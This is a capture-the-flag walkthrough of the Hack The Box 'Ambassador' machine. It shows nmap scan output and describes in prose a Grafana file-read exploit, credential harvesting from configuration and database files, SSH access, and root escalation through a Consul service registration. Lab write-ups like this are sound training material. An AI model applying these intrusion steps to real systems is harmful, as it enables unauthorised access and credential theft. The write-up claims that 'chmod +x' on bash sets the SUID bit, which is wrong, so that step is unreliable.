Hack The Box: Ambassador Machine Walkthrough – Medium Difficulty

In this post, I would like to share a walkthrough of the Ambassador Machine from Hack the Box

This room will be considered a medium machine on Hack the Box

What will you gain from the Ambassador machine?

For the user flag, you will need to abuse the file read vulnerability so that we will be able to read the DB configuration file which we should be able to obtain the password for the admin. As a result, we can get some information by exploring the MySQL instance.

As for the root flag, you need to exploit the Consul vulnerability which it will get us an execution as root.

Information Gathering on Ambassador Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN

# Nmap 7.92 scan initiated Tue Oct  4 08:52:26 2022 as: nmap -sC -sV -oA nmap/intial 10.10.11.183
Nmap scan report for 10.10.11.183
Host is up (0.17s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
|   256 80:a4:c5:2e:9a:b1:ec:da:27:64:39:a4:08:97:3b:ef (ECDSA)
|_  256 f5:90:ba:7d:ed:55:cb:70:07:f2:bb:c8:91:93:1b:f6 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Ambassador Development Server
|_http-generator: Hugo 0.94.2
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open  ppp?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Tue, 04 Oct 2022 12:53:24 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Tue, 04 Oct 2022 12:52:50 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Tue, 04 Oct 2022 12:52:56 GMT
|_    Content-Length: 0
3306/tcp open  mysql   MySQL 8.0.30-0ubuntu0.20.04.2
|_sslv2: ERROR: Script execution failed (use -d to debug)
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.30-0ubuntu0.20.04.2
|   Thread ID: 11
|   Capabilities flags: 65535
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsLoadDataLocal, LongPassword, IgnoreSigpipes, ConnectWithDatabase, SupportsTransactions, FoundRows, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, LongColumnFlag, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: xl4A/\x1Cfr:8J\x19\x13P@-It\x1D\x0E
|_  Auth Plugin Name: caching_sha2_password
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.92%I=7%D=10/4%Time=633C2CA1%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Tue,\x2004\x20Oct\x202022\x2012:52
SF::50\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tu
SF:e,\x2004\x20Oct\x202022\x2012:52:56\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Req
SF:uest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2
SF:0close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1
SF:\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset
SF:=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSess
SF:ionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(FourOhFourRequest,1A1,"HTTP/1\.0\x20302\x20Found\
SF:r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset
SF:=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\
SF:r\nSet-Cookie:\x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity\.txt
SF:%252ebak;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;
SF:\x20mode=block\r\nDate:\x20Tue,\x2004\x20Oct\x202022\x2012:53:24\x20GMT
SF:\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found</a>\.\n\n"
SF:);
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct  4 08:54:41 2022 -- 1 IP address (1 host up) scanned in 135.32 seconds
   

Let’s access the website interface

However, nothing looks interesting for us to play with

When we try to read more on the post, we managed to see the content such as “Use the Developer account to SSH, DevOps will give you the password”

Grafana Website Enumeration

When we try to investigate the website using a different port, we managed to get a Grafana login page. Sadly, we don’t have any credentials that can be used for this purpose.

After looking carefully at the Grafana login page, I notice that there’s a version at the bottom of the page.

Grafana Directory Traversal and Arbitrary File Read

After doing some research on version exploitation on the internet, we stumbled on an exploit-db for the vulnerability on Grafana.

As a result, let’s download the exploit on our attacker’s machine

As we can see in the screenshot above, we cannot use python 2 to execute the exploit

However, the exploit can be used when we run using python3

Finally, the exploit work and we can read any file that has been saved on the machine

For testing purposes, we can try to read the /etc/passwd file, and it looks something as shown above

After doing some research, I found one website over here

At last, we managed to obtain credentials with admin and its password

Grafana Dashboard

Sadly, we don’t retrieve any interesting over here.

From my research previously, we can see another file that might give us some information which is (/var/lib/Grafana/Grafana.db)

For a better view, we can download it on our attacker’s machine.

Finally, we can see the password for the MySQL database which we might be able to look for another user’s credentials.

MySQL Database Enumeration on Ambassador

At last, we are connected to the MySQL database by using the credential that we found earlier.

There are a few databases that we can investigate

Sadly, there are no tables on Grafana’s database.

However, we found a user’s table inside the whackywidget database.

Inside the user’s tables, there’s a different credential that has been saved which we can use for further escalation.

After decoding the hashes from base64, we manage to obtain a password for the developer

Finally, we can access the machine via SSH service by using the developer’s credentials.

We can read the user’s flag by executing the “cat user.txt” command

Escalate to Root Privileges Access on Ambassador Machine

Nothing can be found on the /var directory

There are two directories that look interesting to analyze further

Inside the my-app directory, there are two directories that we can analyze further.

Nothing looks interesting over here

A .git directory have found inside the my-app directory

When analyzing the git history, we managed to see there’s a consul command at the end of the git history

Therefore, let’s save the command “chmod +x /usr/bin/bash” to a new file which in my case I use darknite.sh

We can try to register a new account by executing the command above.

At last, bash has been assigned to the SUID binary

We can read the root flag by executing the “cat root.txt” command

Extra Information